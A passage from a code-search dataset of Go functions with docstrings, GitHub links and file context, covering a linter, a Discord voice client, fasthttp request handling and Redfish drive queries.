in Mosaic Networks to differentiate between dev code and production code. | https://github.com/mosaicnetworks/evm-lite/blob/730249f55ec76df2fb573c4e62b971afc50d05f7/src/version/version_test.go#L10-L14 | package version
import "testing" | MIT License |
suzuki-shunsuke/flute | flute/matcher.go | isMatchService | go | func isMatchService(req *http.Request, service Service) bool {
return req.URL.Scheme+"://"+req.URL.Host == service.Endpoint
} | isMatchService returns whether the request matches the service.
isMatchService checks the request URL.Scheme and URL.Host are equal to the service endpoint. | https://github.com/suzuki-shunsuke/flute/blob/a5d0ff52380047775c422049bb95e05251896017/flute/matcher.go#L15-L17 | package flute
import (
"fmt"
"io/ioutil"
"net/http"
"reflect"
"strings"
"github.com/suzuki-shunsuke/go-dataeq/dataeq"
) | MIT License |
komuw/ote | testdata/mod3/vendor/golang.org/x/lint/lint.go | lintExported | go | func (f *file) lintExported() {
if f.isTest() {
return
}
var lastGen *ast.GenDecl
genDeclMissingComments := make(map[*ast.GenDecl]bool)
f.walk(func(node ast.Node) bool {
switch v := node.(type) {
case *ast.GenDecl:
if v.Tok == token.IMPORT {
return false
}
lastGen = v
return true
case *ast.FuncDecl:
f.lintFuncDoc(v)
if v.Recv == nil {
f.checkStutter(v.Name, "func")
}
return false
case *ast.TypeSpec:
doc := v.Doc
if doc == nil {
doc = lastGen.Doc
}
f.lintTypeDoc(v, doc)
f.checkStutter(v.Name, "type")
return false
case *ast.ValueSpec:
f.lintValueSpecDoc(v, lastGen, genDeclMissingComments)
return false
}
return true
})
} | lintExported examines the exported names.
It complains if any required doc comments are missing,
or if they are not of the right form. The exact rules are in
lintFuncDoc, lintTypeDoc and lintValueSpecDoc; this function
also tracks the GenDecl structure being traversed to permit
doc comments for constants to be on top of the const block.
It also complains if the names stutter when combined with
the package name. | https://github.com/komuw/ote/blob/63e90a9e7b21f4b0c8fb12e19b39b4abf9002d39/testdata/mod3/vendor/golang.org/x/lint/lint.go#L483-L527 | package lint
import (
"bufio"
"bytes"
"fmt"
"go/ast"
"go/parser"
"go/printer"
"go/token"
"go/types"
"regexp"
"sort"
"strconv"
"strings"
"unicode"
"unicode/utf8"
"golang.org/x/tools/go/ast/astutil"
"golang.org/x/tools/go/gcexportdata"
)
const styleGuideBase = "https://golang.org/wiki/CodeReviewComments"
type Linter struct {
}
type Problem struct {
Position token.Position
Text string
Link string
Confidence float64
LineText string
Category string
ReplacementLine string
}
func (p *Problem) String() string {
if p.Link != "" {
return p.Text + "\n\n" + p.Link
}
return p.Text
}
type byPosition []Problem
func (p byPosition) Len() int { return len(p) }
func (p byPosition) Swap(i, j int) { p[i], p[j] = p[j], p[i] }
func (p byPosition) Less(i, j int) bool {
pi, pj := p[i].Position, p[j].Position
if pi.Filename != pj.Filename {
return pi.Filename < pj.Filename
}
if pi.Line != pj.Line {
return pi.Line < pj.Line
}
if pi.Column != pj.Column {
return pi.Column < pj.Column
}
return p[i].Text < p[j].Text
}
func (l *Linter) Lint(filename string, src []byte) ([]Problem, error) {
return l.LintFiles(map[string][]byte{filename: src})
}
func (l *Linter) LintFiles(files map[string][]byte) ([]Problem, error) {
pkg := &pkg{
fset: token.NewFileSet(),
files: make(map[string]*file),
}
var pkgName string
for filename, src := range files {
if isGenerated(src) {
continue
}
f, err := parser.ParseFile(pkg.fset, filename, src, parser.ParseComments)
if err != nil {
return nil, err
}
if pkgName == "" {
pkgName = f.Name.Name
} else if f.Name.Name != pkgName {
return nil, fmt.Errorf("%s is in package %s, not %s", filename, f.Name.Name, pkgName)
}
pkg.files[filename] = &file{
pkg: pkg,
f: f,
fset: pkg.fset,
src: src,
filename: filename,
}
}
if len(pkg.files) == 0 {
return nil, nil
}
return pkg.lint(), nil
}
var (
genHdr = []byte("// Code generated ")
genFtr = []byte(" DO NOT EDIT.")
)
func isGenerated(src []byte) bool {
sc := bufio.NewScanner(bytes.NewReader(src))
for sc.Scan() {
b := sc.Bytes()
if bytes.HasPrefix(b, genHdr) && bytes.HasSuffix(b, genFtr) && len(b) >= len(genHdr)+len(genFtr) {
return true
}
}
return false
}
type pkg struct {
fset *token.FileSet
files map[string]*file
typesPkg *types.Package
typesInfo *types.Info
sortable map[string]bool
main bool
problems []Problem
}
func (p *pkg) lint() []Problem {
if err := p.typeCheck(); err != nil {
}
p.scanSortable()
p.main = p.isMain()
for _, f := range p.files {
f.lint()
}
sort.Sort(byPosition(p.problems))
return p.problems
}
type file struct {
pkg *pkg
f *ast.File
fset *token.FileSet
src []byte
filename string
}
func (f *file) isTest() bool { return strings.HasSuffix(f.filename, "_test.go") }
func (f *file) lint() {
f.lintPackageComment()
f.lintImports()
f.lintBlankImports()
f.lintExported()
f.lintNames()
f.lintElses()
f.lintRanges()
f.lintErrorf()
f.lintErrors()
f.lintErrorStrings()
f.lintReceiverNames()
f.lintIncDec()
f.lintErrorReturn()
f.lintUnexportedReturn()
f.lintTimeNames()
f.lintContextKeyTypes()
f.lintContextArgs()
}
type link string
type category string
func (f *file) errorf(n ast.Node, confidence float64, args ...interface{}) *Problem {
pos := f.fset.Position(n.Pos())
if pos.Filename == "" {
pos.Filename = f.filename
}
return f.pkg.errorfAt(pos, confidence, args...)
}
func (p *pkg) errorfAt(pos token.Position, confidence float64, args ...interface{}) *Problem {
problem := Problem{
Position: pos,
Confidence: confidence,
}
if pos.Filename != "" {
if f, ok := p.files[pos.Filename]; ok {
problem.LineText = srcLine(f.src, pos)
}
}
argLoop:
for len(args) > 1 {
switch v := args[0].(type) {
case link:
problem.Link = string(v)
case category:
problem.Category = string(v)
default:
break argLoop
}
args = args[1:]
}
problem.Text = fmt.Sprintf(args[0].(string), args[1:]...)
p.problems = append(p.problems, problem)
return &p.problems[len(p.problems)-1]
}
var newImporter = func(fset *token.FileSet) types.ImporterFrom {
return gcexportdata.NewImporter(fset, make(map[string]*types.Package))
}
func (p *pkg) typeCheck() error {
config := &types.Config{
Error: func(error) {},
Importer: newImporter(p.fset),
}
info := &types.Info{
Types: make(map[ast.Expr]types.TypeAndValue),
Defs: make(map[*ast.Ident]types.Object),
Uses: make(map[*ast.Ident]types.Object),
Scopes: make(map[ast.Node]*types.Scope),
}
var anyFile *file
var astFiles []*ast.File
for _, f := range p.files {
anyFile = f
astFiles = append(astFiles, f.f)
}
pkg, err := config.Check(anyFile.f.Name.Name, p.fset, astFiles, info)
p.typesPkg = pkg
p.typesInfo = info
return err
}
func (p *pkg) typeOf(expr ast.Expr) types.Type {
if p.typesInfo == nil {
return nil
}
return p.typesInfo.TypeOf(expr)
}
func (p *pkg) isNamedType(typ types.Type, importPath, name string) bool {
n, ok := typ.(*types.Named)
if !ok {
return false
}
tn := n.Obj()
return tn != nil && tn.Pkg() != nil && tn.Pkg().Path() == importPath && tn.Name() == name
}
func (p *pkg) scopeOf(id *ast.Ident) *types.Scope {
var scope *types.Scope
if obj := p.typesInfo.ObjectOf(id); obj != nil {
scope = obj.Parent()
}
if scope == p.typesPkg.Scope() {
pos := id.Pos()
for _, f := range p.files {
if f.f.Pos() <= pos && pos < f.f.End() {
scope = p.typesInfo.Scopes[f.f]
break
}
}
}
return scope
}
func (p *pkg) scanSortable() {
p.sortable = make(map[string]bool)
const (
Len = 1 << iota
Less
Swap
)
nmap := map[string]int{"Len": Len, "Less": Less, "Swap": Swap}
has := make(map[string]int)
for _, f := range p.files {
f.walk(func(n ast.Node) bool {
fn, ok := n.(*ast.FuncDecl)
if !ok || fn.Recv == nil || len(fn.Recv.List) == 0 {
return true
}
recv := receiverType(fn)
if i, ok := nmap[fn.Name.Name]; ok {
has[recv] |= i
}
return false
})
}
for typ, ms := range has {
if ms == Len|Less|Swap {
p.sortable[typ] = true
}
}
}
func (p *pkg) isMain() bool {
for _, f := range p.files {
if f.isMain() {
return true
}
}
return false
}
func (f *file) isMain() bool {
if f.f.Name.Name == "main" {
return true
}
return false
}
func (f *file) lintPackageComment() {
if f.isTest() {
return
}
const ref = styleGuideBase + "#package-comments"
prefix := "Package " + f.f.Name.Name + " "
var lastCG *ast.CommentGroup
for _, cg := range f.f.Comments {
if cg.Pos() > f.f.Package {
break
}
lastCG = cg
}
if lastCG != nil && strings.HasPrefix(lastCG.Text(), prefix) {
endPos := f.fset.Position(lastCG.End())
pkgPos := f.fset.Position(f.f.Package)
if endPos.Line+1 < pkgPos.Line {
pos := token.Position{
Filename: endPos.Filename,
Line: endPos.Line + 1,
Column: 1,
}
f.pkg.errorfAt(pos, 0.9, link(ref), category("comments"), "package comment is detached; there should be no blank lines between it and the package statement")
return
}
}
if f.f.Doc == nil {
f.errorf(f.f, 0.2, link(ref), category("comments"), "should have a package comment, unless it's in another file for this package")
return
}
s := f.f.Doc.Text()
if ts := strings.TrimLeft(s, " \t"); ts != s {
f.errorf(f.f.Doc, 1, link(ref), category("comments"), "package comment should not have leading space")
s = ts
}
if !f.pkg.main && !strings.HasPrefix(s, prefix) {
f.errorf(f.f.Doc, 1, link(ref), category("comments"), `package comment should be of the form "%s..."`, prefix)
}
}
func (f *file) lintBlankImports() {
if f.pkg.main || f.isTest() {
return
}
for i, imp := range f.f.Imports {
pos := f.fset.Position(imp.Pos())
if !isBlank(imp.Name) {
continue
}
if i > 0 {
prev := f.f.Imports[i-1]
prevPos := f.fset.Position(prev.Pos())
if isBlank(prev.Name) && prevPos.Line+1 == pos.Line {
continue
}
}
if imp.Doc == nil && imp.Comment == nil {
ref := ""
f.errorf(imp, 1, link(ref), category("imports"), "a blank import should be only in a main or test package, or have a comment justifying it")
}
}
}
func (f *file) lintImports() {
for i, is := range f.f.Imports {
_ = i
if is.Name != nil && is.Name.Name == "." && !f.isTest() {
f.errorf(is, 1, link(styleGuideBase+"#import-dot"), category("imports"), "should not use dot imports")
}
}
}
const docCommentsLink = styleGuideBase + "#doc-comments" | MIT License |
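Usage sketch for the Linter API visible in this record; lintExported is one of the per-file checks that contributes to the returned problems. The import path and the log/fmt plumbing are assumptions.

// Sketch: lint a single in-memory file and print what came back.
src := []byte("package demo\n\nfunc Exported() {}\n")
problems, err := (&lint.Linter{}).Lint("demo.go", src)
if err != nil {
	log.Fatal(err)
}
for _, p := range problems {
	fmt.Printf("%s:%d: %s\n", p.Position.Filename, p.Position.Line, p.Text)
}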
skwair/harmony | voice_connection.go | SwitchVoiceChannel | go | func (c *Client) SwitchVoiceChannel(ctx context.Context, guildID string, channelID string) error {
c.mu.Lock()
defer c.mu.Unlock()
conn, ok := c.voiceConnections[guildID]
if !ok {
return discord.ErrNotConnectedToVoice
}
vsu := &voice.StateUpdate{
State: voice.State{
GuildID: guildID,
ChannelID: &channelID,
SelfMute: conn.State().SelfMute,
SelfDeaf: conn.State().SelfDeaf,
},
}
if err := c.sendPayload(ctx, gatewayOpcodeVoiceStateUpdate, vsu); err != nil {
return err
}
return nil
} | SwitchVoiceChannel can be used to switch from one voice channel to another. It requires an
active voice connection in the guild. You can get one with JoinVoiceChannel. | https://github.com/skwair/harmony/blob/63b40974201c79279b4810bd0c7efbef098bc2e2/voice_connection.go#L73-L94 | package harmony
import (
"context"
"encoding/json"
"errors"
"fmt"
"time"
"github.com/skwair/harmony/discord"
"github.com/skwair/harmony/internal/payload"
"github.com/skwair/harmony/voice"
)
func (c *Client) JoinVoiceChannel(ctx context.Context, guildID, channelID string, mute, deaf bool) (*voice.Connection, error) {
c.mu.Lock()
defer c.mu.Unlock()
if !c.isConnected() {
return nil, discord.ErrGatewayNotConnected
}
if _, ok := c.voiceConnections[guildID]; ok {
return nil, discord.ErrAlreadyConnectedToVoice
}
c.connectingToVoice.Store(true)
defer c.connectingToVoice.Store(false)
vsu := &voice.StateUpdate{
State: voice.State{
GuildID: guildID,
ChannelID: &channelID,
SelfMute: mute,
SelfDeaf: deaf,
},
}
if err := c.sendPayload(ctx, gatewayOpcodeVoiceStateUpdate, vsu); err != nil {
return nil, err
}
state, server, err := getStateAndServer(c.voicePayloads)
if err != nil {
return nil, err
}
conn, err := voice.Connect(ctx, state, server, voice.WithLogger(c.logger))
if err != nil {
return nil, err
}
c.voiceConnections[guildID] = conn
return conn, nil
} | MIT License |
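Usage sketch combining JoinVoiceChannel (referenced in the doc comment above) with SwitchVoiceChannel; the client is assumed to be a connected harmony client and the channel IDs are placeholders.

// Sketch: the mute/deaf flags passed to JoinVoiceChannel are arbitrary here.
func moveBot(ctx context.Context, client *harmony.Client, guildID, fromID, toID string) error {
	conn, err := client.JoinVoiceChannel(ctx, guildID, fromID, false, true)
	if err != nil {
		return err
	}
	_ = conn // audio flows through the returned *voice.Connection
	// Move to another channel in the same guild without tearing the connection down.
	return client.SwitchVoiceChannel(ctx, guildID, toID)
}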
hnlq715/httpmq | vendor/github.com/valyala/fasthttp/server.go | PostBody | go | func (ctx *RequestCtx) PostBody() []byte {
return ctx.Request.Body()
} | PostBody returns the POST request body.
The returned value is valid until RequestHandler return. | https://github.com/hnlq715/httpmq/blob/59457eb6745fc57292a83456a65f579d38d45177/vendor/github.com/valyala/fasthttp/server.go#L962-L964 | package fasthttp
import (
"bufio"
"crypto/tls"
"errors"
"fmt"
"io"
"log"
"mime/multipart"
"net"
"os"
"runtime/debug"
"strings"
"sync"
"sync/atomic"
"time"
)
func ServeConn(c net.Conn, handler RequestHandler) error {
v := serverPool.Get()
if v == nil {
v = &Server{}
}
s := v.(*Server)
s.Handler = handler
err := s.ServeConn(c)
s.Handler = nil
serverPool.Put(v)
return err
}
var serverPool sync.Pool
func Serve(ln net.Listener, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.Serve(ln)
}
func ServeTLS(ln net.Listener, certFile, keyFile string, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ServeTLS(ln, certFile, keyFile)
}
func ServeTLSEmbed(ln net.Listener, certData, keyData []byte, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ServeTLSEmbed(ln, certData, keyData)
}
func ListenAndServe(addr string, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ListenAndServe(addr)
}
func ListenAndServeUNIX(addr string, mode os.FileMode, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ListenAndServeUNIX(addr, mode)
}
func ListenAndServeTLS(addr, certFile, keyFile string, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ListenAndServeTLS(addr, certFile, keyFile)
}
func ListenAndServeTLSEmbed(addr string, certData, keyData []byte, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ListenAndServeTLSEmbed(addr, certData, keyData)
}
type RequestHandler func(ctx *RequestCtx)
type Server struct {
noCopy noCopy
Handler RequestHandler
Name string
Concurrency int
DisableKeepalive bool
ReadBufferSize int
WriteBufferSize int
ReadTimeout time.Duration
WriteTimeout time.Duration
MaxConnsPerIP int
MaxRequestsPerConn int
MaxKeepaliveDuration time.Duration
MaxRequestBodySize int
ReduceMemoryUsage bool
GetOnly bool
LogAllErrors bool
DisableHeaderNamesNormalizing bool
Logger Logger
concurrency uint32
perIPConnCounter perIPConnCounter
serverName atomic.Value
ctxPool sync.Pool
readerPool sync.Pool
writerPool sync.Pool
hijackConnPool sync.Pool
bytePool sync.Pool
}
func TimeoutHandler(h RequestHandler, timeout time.Duration, msg string) RequestHandler {
if timeout <= 0 {
return h
}
return func(ctx *RequestCtx) {
ch := ctx.timeoutCh
if ch == nil {
ch = make(chan struct{}, 1)
ctx.timeoutCh = ch
}
go func() {
h(ctx)
ch <- struct{}{}
}()
ctx.timeoutTimer = initTimer(ctx.timeoutTimer, timeout)
select {
case <-ch:
case <-ctx.timeoutTimer.C:
ctx.TimeoutError(msg)
}
stopTimer(ctx.timeoutTimer)
}
}
func CompressHandler(h RequestHandler) RequestHandler {
return CompressHandlerLevel(h, CompressDefaultCompression)
}
func CompressHandlerLevel(h RequestHandler, level int) RequestHandler {
return func(ctx *RequestCtx) {
h(ctx)
if ctx.Request.Header.HasAcceptEncodingBytes(strGzip) {
ctx.Response.gzipBody(level)
} else if ctx.Request.Header.HasAcceptEncodingBytes(strDeflate) {
ctx.Response.deflateBody(level)
}
}
}
type RequestCtx struct {
noCopy noCopy
Request Request
Response Response
userValues userData
id uint64
lastReadDuration time.Duration
connRequestNum uint64
connTime time.Time
time time.Time
logger ctxLogger
s *Server
c net.Conn
fbr firstByteReader
timeoutResponse *Response
timeoutCh chan struct{}
timeoutTimer *time.Timer
hijackHandler HijackHandler
}
type HijackHandler func(c net.Conn)
func (ctx *RequestCtx) Hijack(handler HijackHandler) {
ctx.hijackHandler = handler
}
func (ctx *RequestCtx) SetUserValue(key string, value interface{}) {
ctx.userValues.Set(key, value)
}
func (ctx *RequestCtx) SetUserValueBytes(key []byte, value interface{}) {
ctx.userValues.SetBytes(key, value)
}
func (ctx *RequestCtx) UserValue(key string) interface{} {
return ctx.userValues.Get(key)
}
func (ctx *RequestCtx) UserValueBytes(key []byte) interface{} {
return ctx.userValues.GetBytes(key)
}
func (ctx *RequestCtx) IsTLS() bool {
_, ok := ctx.c.(*tls.Conn)
return ok
}
func (ctx *RequestCtx) TLSConnectionState() *tls.ConnectionState {
tlsConn, ok := ctx.c.(*tls.Conn)
if !ok {
return nil
}
state := tlsConn.ConnectionState()
return &state
}
type firstByteReader struct {
c net.Conn
ch byte
byteRead bool
}
func (r *firstByteReader) Read(b []byte) (int, error) {
if len(b) == 0 {
return 0, nil
}
nn := 0
if !r.byteRead {
b[0] = r.ch
b = b[1:]
r.byteRead = true
nn = 1
}
n, err := r.c.Read(b)
return n + nn, err
}
type Logger interface {
Printf(format string, args ...interface{})
}
var ctxLoggerLock sync.Mutex
type ctxLogger struct {
ctx *RequestCtx
logger Logger
}
func (cl *ctxLogger) Printf(format string, args ...interface{}) {
ctxLoggerLock.Lock()
msg := fmt.Sprintf(format, args...)
ctx := cl.ctx
req := &ctx.Request
cl.logger.Printf("%.3f #%016X - %s<->%s - %s %s - %s",
time.Since(ctx.Time()).Seconds(), ctx.ID(), ctx.LocalAddr(), ctx.RemoteAddr(), req.Header.Method(), ctx.URI().FullURI(), msg)
ctxLoggerLock.Unlock()
}
var zeroTCPAddr = &net.TCPAddr{
IP: net.IPv4zero,
}
func (ctx *RequestCtx) ID() uint64 {
return ctx.id
}
func (ctx *RequestCtx) Time() time.Time {
return ctx.time
}
func (ctx *RequestCtx) ConnTime() time.Time {
return ctx.connTime
}
func (ctx *RequestCtx) ConnRequestNum() uint64 {
return ctx.connRequestNum
}
func (ctx *RequestCtx) SetConnectionClose() {
ctx.Response.SetConnectionClose()
}
func (ctx *RequestCtx) SetStatusCode(statusCode int) {
ctx.Response.SetStatusCode(statusCode)
}
func (ctx *RequestCtx) SetContentType(contentType string) {
ctx.Response.Header.SetContentType(contentType)
}
func (ctx *RequestCtx) SetContentTypeBytes(contentType []byte) {
ctx.Response.Header.SetContentTypeBytes(contentType)
}
func (ctx *RequestCtx) RequestURI() []byte {
return ctx.Request.Header.RequestURI()
}
func (ctx *RequestCtx) URI() *URI {
return ctx.Request.URI()
}
func (ctx *RequestCtx) Referer() []byte {
return ctx.Request.Header.Referer()
}
func (ctx *RequestCtx) UserAgent() []byte {
return ctx.Request.Header.UserAgent()
}
func (ctx *RequestCtx) Path() []byte {
return ctx.URI().Path()
}
func (ctx *RequestCtx) Host() []byte {
return ctx.URI().Host()
}
func (ctx *RequestCtx) QueryArgs() *Args {
return ctx.URI().QueryArgs()
}
func (ctx *RequestCtx) PostArgs() *Args {
return ctx.Request.PostArgs()
}
func (ctx *RequestCtx) MultipartForm() (*multipart.Form, error) {
return ctx.Request.MultipartForm()
}
func (ctx *RequestCtx) FormFile(key string) (*multipart.FileHeader, error) {
mf, err := ctx.MultipartForm()
if err != nil {
return nil, err
}
if mf.File == nil {
return nil, err
}
fhh := mf.File[key]
if fhh == nil {
return nil, ErrMissingFile
}
return fhh[0], nil
}
var ErrMissingFile = errors.New("there is no uploaded file associated with the given key")
func SaveMultipartFile(fh *multipart.FileHeader, path string) error {
f, err := fh.Open()
if err != nil {
return err
}
defer f.Close()
if ff, ok := f.(*os.File); ok {
return os.Rename(ff.Name(), path)
}
ff, err := os.Create(path)
if err != nil {
return err
}
defer ff.Close()
_, err = copyZeroAlloc(ff, f)
return err
}
func (ctx *RequestCtx) FormValue(key string) []byte {
v := ctx.QueryArgs().Peek(key)
if len(v) > 0 {
return v
}
v = ctx.PostArgs().Peek(key)
if len(v) > 0 {
return v
}
mf, err := ctx.MultipartForm()
if err == nil && mf.Value != nil {
vv := mf.Value[key]
if len(vv) > 0 {
return []byte(vv[0])
}
}
return nil
}
func (ctx *RequestCtx) IsGet() bool {
return ctx.Request.Header.IsGet()
}
func (ctx *RequestCtx) IsPost() bool {
return ctx.Request.Header.IsPost()
}
func (ctx *RequestCtx) IsPut() bool {
return ctx.Request.Header.IsPut()
}
func (ctx *RequestCtx) Method() []byte {
return ctx.Request.Header.Method()
}
func (ctx *RequestCtx) IsHead() bool {
return ctx.Request.Header.IsHead()
}
func (ctx *RequestCtx) RemoteAddr() net.Addr {
addr := ctx.c.RemoteAddr()
if addr == nil {
return zeroTCPAddr
}
return addr
}
func (ctx *RequestCtx) LocalAddr() net.Addr {
addr := ctx.c.LocalAddr()
if addr == nil {
return zeroTCPAddr
}
return addr
}
func (ctx *RequestCtx) RemoteIP() net.IP {
x, ok := ctx.RemoteAddr().(*net.TCPAddr)
if !ok {
return net.IPv4zero
}
return x.IP
}
func (ctx *RequestCtx) Error(msg string, statusCode int) {
ctx.Response.Reset()
ctx.SetStatusCode(statusCode)
ctx.SetContentTypeBytes(defaultContentType)
ctx.SetBodyString(msg)
}
func (ctx *RequestCtx) Success(contentType string, body []byte) {
ctx.SetContentType(contentType)
ctx.SetBody(body)
}
func (ctx *RequestCtx) SuccessString(contentType, body string) {
ctx.SetContentType(contentType)
ctx.SetBodyString(body)
}
func (ctx *RequestCtx) Redirect(uri string, statusCode int) {
u := AcquireURI()
ctx.URI().CopyTo(u)
u.Update(uri)
ctx.redirect(u.FullURI(), statusCode)
ReleaseURI(u)
}
func (ctx *RequestCtx) RedirectBytes(uri []byte, statusCode int) {
s := b2s(uri)
ctx.Redirect(s, statusCode)
}
func (ctx *RequestCtx) redirect(uri []byte, statusCode int) {
ctx.Response.Header.SetCanonical(strLocation, uri)
statusCode = getRedirectStatusCode(statusCode)
ctx.Response.SetStatusCode(statusCode)
}
func getRedirectStatusCode(statusCode int) int {
if statusCode == StatusMovedPermanently || statusCode == StatusFound ||
statusCode == StatusSeeOther || statusCode == StatusTemporaryRedirect {
return statusCode
}
return StatusFound
}
func (ctx *RequestCtx) SetBody(body []byte) {
ctx.Response.SetBody(body)
}
func (ctx *RequestCtx) SetBodyString(body string) {
ctx.Response.SetBodyString(body)
}
func (ctx *RequestCtx) ResetBody() {
ctx.Response.ResetBody()
}
func (ctx *RequestCtx) SendFile(path string) {
ServeFile(ctx, path)
}
func (ctx *RequestCtx) SendFileBytes(path []byte) {
ServeFileBytes(ctx, path)
}
func (ctx *RequestCtx) IfModifiedSince(lastModified time.Time) bool {
ifModStr := ctx.Request.Header.peek(strIfModifiedSince)
if len(ifModStr) == 0 {
return true
}
ifMod, err := ParseHTTPDate(ifModStr)
if err != nil {
return true
}
lastModified = lastModified.Truncate(time.Second)
return ifMod.Before(lastModified)
}
func (ctx *RequestCtx) NotModified() {
ctx.Response.Reset()
ctx.SetStatusCode(StatusNotModified)
}
func (ctx *RequestCtx) NotFound() {
ctx.Response.Reset()
ctx.SetStatusCode(StatusNotFound)
ctx.SetBodyString("404 Page not found")
}
func (ctx *RequestCtx) Write(p []byte) (int, error) {
ctx.Response.AppendBody(p)
return len(p), nil
}
func (ctx *RequestCtx) WriteString(s string) (int, error) {
ctx.Response.AppendBodyString(s)
return len(s), nil
} | MIT License |
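A minimal usage sketch for the multipart helpers above (FormFile, SaveMultipartFile, FormValue). It is not part of the fasthttp source in this record; the handler name, form keys, save path, and listen address are illustrative assumptions.

package main

import (
	"fmt"
	"log"

	"github.com/valyala/fasthttp"
)

// uploadHandler saves the file sent under the "file" form key and echoes the
// optional "comment" field. A real handler should sanitize fh.Filename before
// using it in a path.
func uploadHandler(ctx *fasthttp.RequestCtx) {
	fh, err := ctx.FormFile("file")
	if err != nil {
		ctx.Error(err.Error(), fasthttp.StatusBadRequest)
		return
	}
	if err := fasthttp.SaveMultipartFile(fh, "/tmp/"+fh.Filename); err != nil {
		ctx.Error(err.Error(), fasthttp.StatusInternalServerError)
		return
	}
	// FormValue falls back through query args, POST args, then the multipart form.
	comment := ctx.FormValue("comment")
	fmt.Fprintf(ctx, "saved %s (%d bytes), comment=%q\n", fh.Filename, fh.Size, comment)
}

func main() {
	log.Fatal(fasthttp.ListenAndServe(":8080", uploadHandler))
}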
stmcginnis/gofish | redfish/drive.go | PCIeFunctions | go | func (drive *Drive) PCIeFunctions() ([]*PCIeFunction, error) {
var result []*PCIeFunction
collectionError := common.NewCollectionError()
for _, pcieFunctionLink := range drive.pcieFunctions {
pcieFunction, err := GetPCIeFunction(drive.Client, pcieFunctionLink)
if err != nil {
collectionError.Failures[pcieFunctionLink] = err
} else {
result = append(result, pcieFunction)
}
}
if collectionError.Empty() {
return result, nil
}
return result, collectionError
} | PCIeFunctions references the PCIeFunctions that this drive is associated with. | https://github.com/stmcginnis/gofish/blob/d33a9c3efa5e173d33618942c693c094f587b3ac/redfish/drive.go#L423-L441 | package redfish
import (
"encoding/json"
"reflect"
"github.com/stmcginnis/gofish/common"
)
type EncryptionAbility string
const (
NoneEncryptionAbility EncryptionAbility = "None"
SelfEncryptingDriveEncryptionAbility EncryptionAbility = "SelfEncryptingDrive"
OtherEncryptionAbility EncryptionAbility = "Other"
)
type EncryptionStatus string
const (
UnecryptedEncryptionStatus EncryptionStatus = "Unecrypted"
UnlockedEncryptionStatus EncryptionStatus = "Unlocked"
LockedEncryptionStatus EncryptionStatus = "Locked"
ForeignEncryptionStatus EncryptionStatus = "Foreign"
UnencryptedEncryptionStatus EncryptionStatus = "Unencrypted"
)
type HotspareReplacementModeType string
const (
RevertibleHotspareReplacementModeType HotspareReplacementModeType = "Revertible"
NonRevertibleHotspareReplacementModeType HotspareReplacementModeType = "NonRevertible"
)
type HotspareType string
const (
NoneHotspareType HotspareType = "None"
GlobalHotspareType HotspareType = "Global"
ChassisHotspareType HotspareType = "Chassis"
DedicatedHotspareType HotspareType = "Dedicated"
)
type MediaType string
const (
HDDMediaType MediaType = "HDD"
SSDMediaType MediaType = "SSD"
SMRMediaType MediaType = "SMR"
)
type StatusIndicator string
const (
OKStatusIndicator StatusIndicator = "OK"
FailStatusIndicator StatusIndicator = "Fail"
RebuildStatusIndicator StatusIndicator = "Rebuild"
PredictiveFailureAnalysisStatusIndicator StatusIndicator = "PredictiveFailureAnalysis"
HotspareStatusIndicator StatusIndicator = "Hotspare"
InACriticalArrayStatusIndicator StatusIndicator = "InACriticalArray"
InAFailedArrayStatusIndicator StatusIndicator = "InAFailedArray"
)
type Drive struct {
common.Entity
ODataContext string `json:"@odata.context"`
ODataType string `json:"@odata.type"`
assembly string
AssetTag string
BlockSizeBytes int
CapableSpeedGbs float32
CapacityBytes int64
Description string
EncryptionAbility EncryptionAbility
EncryptionStatus EncryptionStatus
FailurePredicted bool
HotspareReplacementMode HotspareReplacementModeType
HotspareType HotspareType
Identifiers []common.Identifier
IndicatorLED common.IndicatorLED
Location []common.Location
Manufacturer string
MediaType MediaType
Model string
Multipath bool
NegotiatedSpeedGbs float32
Operations []common.Operations
PartNumber string
PhysicalLocation common.Location
PredictedMediaLifeLeftPercent float32
Protocol common.Protocol
Revision string
RotationSpeedRPM float32
SKU string
SerialNumber string
Status common.Status
StatusIndicator StatusIndicator
WriteCacheEnabled bool
chassis string
endpoints []string
EndpointsCount int `json:"[email protected]"`
volumes []string
VolumesCount int
pcieFunctions []string
PCIeFunctionCount int
StoragePoolsCount int
secureEraseTarget string
rawData []byte
}
func (drive *Drive) UnmarshalJSON(b []byte) error {
type temp Drive
type links struct {
Chassis common.Link
Endpoints common.Links
EndpointCount int `json:"[email protected]"`
PCIeFunctions common.Links
PCIeFunctionsCount int `json:"[email protected]"`
StoragePools common.Links
StoragePoolsCount int `json:"[email protected]"`
Volumes common.Links
VolumeCount int `json:"[email protected]"`
}
type Actions struct {
SecureErase struct {
Target string
} `json:"#Drive.SecureErase"`
}
var t struct {
temp
Links links
Actions Actions
Assembly common.Link
}
err := json.Unmarshal(b, &t)
if err != nil {
return err
}
*drive = Drive(t.temp)
drive.assembly = string(t.Assembly)
drive.chassis = string(t.Links.Chassis)
drive.endpoints = t.Links.Endpoints.ToStrings()
drive.EndpointsCount = t.Links.EndpointCount
drive.volumes = t.Links.Volumes.ToStrings()
drive.VolumesCount = t.Links.VolumeCount
drive.pcieFunctions = t.Links.PCIeFunctions.ToStrings()
drive.PCIeFunctionCount = t.Links.PCIeFunctionsCount
drive.secureEraseTarget = t.Actions.SecureErase.Target
drive.rawData = b
return nil
}
func (drive *Drive) Update() error {
original := new(Drive)
err := original.UnmarshalJSON(drive.rawData)
if err != nil {
return err
}
readWriteFields := []string{
"AssetTag",
"HotspareReplacementMode",
"IndicatorLED",
"StatusIndicator",
"WriteCacheEnabled",
}
originalElement := reflect.ValueOf(original).Elem()
currentElement := reflect.ValueOf(drive).Elem()
return drive.Entity.Update(originalElement, currentElement, readWriteFields)
}
func GetDrive(c common.Client, uri string) (*Drive, error) {
resp, err := c.Get(uri)
if err != nil {
return nil, err
}
defer resp.Body.Close()
var drive Drive
err = json.NewDecoder(resp.Body).Decode(&drive)
if err != nil {
return nil, err
}
drive.SetClient(c)
return &drive, nil
}
func ListReferencedDrives(c common.Client, link string) ([]*Drive, error) {
var result []*Drive
if link == "" {
return result, nil
}
links, err := common.GetCollection(c, link)
if err != nil {
return result, err
}
collectionError := common.NewCollectionError()
